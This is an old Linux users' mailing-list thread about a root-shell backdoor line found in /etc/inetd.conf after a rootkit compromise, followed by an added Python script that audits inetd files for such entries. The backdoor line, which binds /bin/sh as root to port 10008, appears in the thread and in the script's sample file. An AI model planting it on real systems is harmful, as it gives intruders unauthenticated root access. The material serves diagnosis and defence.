It was a BIND + t0rn rootkit exploit. Before April 1 I was using BIND
8.2.2-P5 and the fookin WORM got me.

I did upgrade BIND and reinstalled some packages like inetd,
net-tools, etc. to totally erase all trojan files.



thanks,
dwen



On Tue, 22 May 2001, philip morales wrote:

> " # 10008 stream tcp nowait root /bin/sh sh "
> if you telnet to your box at port 10008
> you get instant access hehehe. Not unless you got your
> firewall up and running, or unless someone flushed that
> firewall
> --- Michael Vincent Pozon <[EMAIL PROTECTED]> wrote:
> > dwen,
> > you can remove that line and lookup for updated
> > versions for any services
> > you are running on your system.
> >
> > i think that's an inetd feature, but in order to
> > write to /etc/inetd.conf ,
> > a user must have write access to /etc/inetd.conf
> > which is normally the root.
> > Someone probably exploited your system and got root
> > access, then added that
> > line to /etc/inetd.conf as his backdoor.
> >
> > Regards,
> > Michael Vincent Pozon
> > - CIS/CNO/CNI
> > Tel # (+65) 7806569
> > Pager # 95493318
> > Mobile/Text # (+65) 94750962
> >
> >
> > # -----Original Message-----
> > # From: dwen [mailto:[EMAIL PROTECTED]]
> > # Sent: Tuesday, May 22, 2001 2:39 PM
> > # To: [EMAIL PROTECTED]
> > # Subject: [plug] inetd
> > #
> > # file: /etc/inetd.conf
> > # i have this line :
> > #
> > # 10008 stream tcp nowait root /bin/sh sh
> > #
> > # what will it do ?
> > #
> > #
> > # thanks,
> > # dwen
> > _
> > Philippine Linux Users Group. Web site and archives
> > at http://plug.linux.org.ph
> > To leave: send "unsubscribe" in the body to
> > [EMAIL PROTECTED]
> >
> > To subscribe to the Linux Newbies' List: send
> > "subscribe" in the body to
> > [EMAIL PROTECTED]
>
>
>
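
An added example, not part of the original thread: a small auditor for the /etc/inetd.conf format discussed above that flags any entry handing a socket directly to a shell, including commented-out ones, which are inactive but still evidence of tampering. The sample file is constructed; the function names and the port 10009 line are assumptions for illustration.

```python
import os

SHELLS = {"sh", "bash", "ash", "dash", "csh", "tcsh", "ksh", "zsh"}
SOCK_TYPES = {"stream", "dgram", "raw", "rdm", "seqpacket"}

def parse_entry(line):
    """Return the inetd.conf fields of one line, or None if it is not an entry."""
    f = line.split()
    # service, socket type, protocol, wait flag, user, server program, then args
    if len(f) < 6 or f[1] not in SOCK_TYPES:
        return None
    return dict(service=f[0], socktype=f[1], proto=f[2], wait=f[3],
                user=f[4], server=f[5], args=f[6:])

def audit_inetd(text):
    """Flag entries whose server program is a shell (active or commented out)."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        stripped = raw.strip()
        active = not stripped.startswith("#")
        entry = parse_entry(stripped.lstrip("#"))
        if entry is None:
            continue  # blank line or ordinary comment
        # With tcpd in front, the real program is the first argument.
        target = entry["server"]
        if os.path.basename(target) == "tcpd" and entry["args"]:
            target = entry["args"][0]
        if os.path.basename(target) not in SHELLS:
            continue
        findings.append({
            "line": lineno,
            "active": active,
            "port": entry["service"],
            "user": entry["user"].split(".")[0].split(":")[0],
            "numeric_port": entry["service"].isdigit(),  # not a named service
        })
    return findings

# Constructed sample file: two normal services plus the backdoor line from the thread.
SAMPLE = """\
# constructed sample /etc/inetd.conf
ftp     stream  tcp  nowait  root  /usr/sbin/tcpd  in.ftpd -l -a
telnet  stream  tcp  nowait  root  /usr/sbin/tcpd  in.telnetd
10008 stream tcp nowait root /bin/sh sh
# 10009 stream tcp nowait root /bin/sh sh
"""

if __name__ == "__main__":
    for f in audit_inetd(SAMPLE):
        state = "ACTIVE" if f["active"] else "commented out"
        print(f"line {f['line']}: shell on port {f['port']} as {f['user']} ({state})")
```

On a host where a rootkit has been installed, run this over a copy of the file read from a known-clean system rather than on the compromised box itself.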

